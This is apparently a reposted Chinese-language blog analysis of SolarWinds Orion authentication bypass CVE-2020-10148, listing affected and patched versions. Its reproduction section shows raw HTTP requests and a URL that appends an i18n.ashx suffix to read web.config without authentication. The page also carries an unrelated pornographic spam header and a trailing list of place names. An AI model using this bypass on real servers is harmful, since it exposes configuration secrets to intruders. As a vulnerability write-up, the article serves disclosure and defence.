亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

發布時間:2021-12-28 20:10:08 來源:億速云 閱讀:167 作者:柒染 欄目:安全技術

這篇文章給大家介紹SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

SolarWinds Orion API 遠程代碼執行漏洞

(CVE-2020-10148)

一、漏洞概況

SolarWinds Orion API 嵌入在 Orion Core 中,被用于與所有 SolarWinds Orion Platform 產品進行接口。通過在URI請求的Request.PathInfo 部分中包含特定參數,可以繞過 API 身份驗證,這可能允許攻擊者執行未經身份驗證的 API 命令。如果攻擊者將WebResource.adx,scriptResource.adx,i18n.ashx 或 Skipi18n 的 PathInfo 參數附加到對 SolarWinds Orion 服務器的請求,SolarWinds 可能會設置 SkipAuthorization 標志,該標志可能允許處理API請求無需身份驗證。

攻擊者可利用該漏洞遠程執行任意代碼,有專業黑客組織利用該漏洞投遞代號為'SUPERNOVA'的惡意程序。

二、漏洞影響范圍

影響版本:

SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本

安全版本:

SolarWinds Orion 2019.4 HF 6(2020年12月14日發布)

SolarWinds Orion 2020.2.1 HF 2(發布于2020年12月15日)

SolarWinds Orion 2019.2 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.4 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.2 SUPERNOVA補丁(2020年12月23日發布)

三、漏洞復現

訪問/Orion/invalid.aspx.js 路徑,截取請求頭中Location中data獲取

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

將 .i18n.ashx?l=en-US&v=43005.14.L攜帶到下個訪問路徑,從而繞過身份認證。這里訪問的是 web.config文件。

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

直接訪問也行:

http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

關于SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

富宁县| 陕西省| 资溪县| 临漳县| 武城县| 南漳县| 资兴市| 三亚市| 青铜峡市| 大余县| 宁津县| 隆化县| 井研县| 凌云县| 依安县| 祁连县| 浦北县| 循化| 晋州市| 永寿县| 厦门市| 富平县| 新民市| 云霄县| 江川县| 唐海县| 清水河县| 广宁县| 天峨县| 庄浪县| 天镇县| 宝清县| 龙口市| 嘉兴市| 洪雅县| 河池市| 蒲江县| 锦州市| 虹口区| 固安县| 阿克苏市|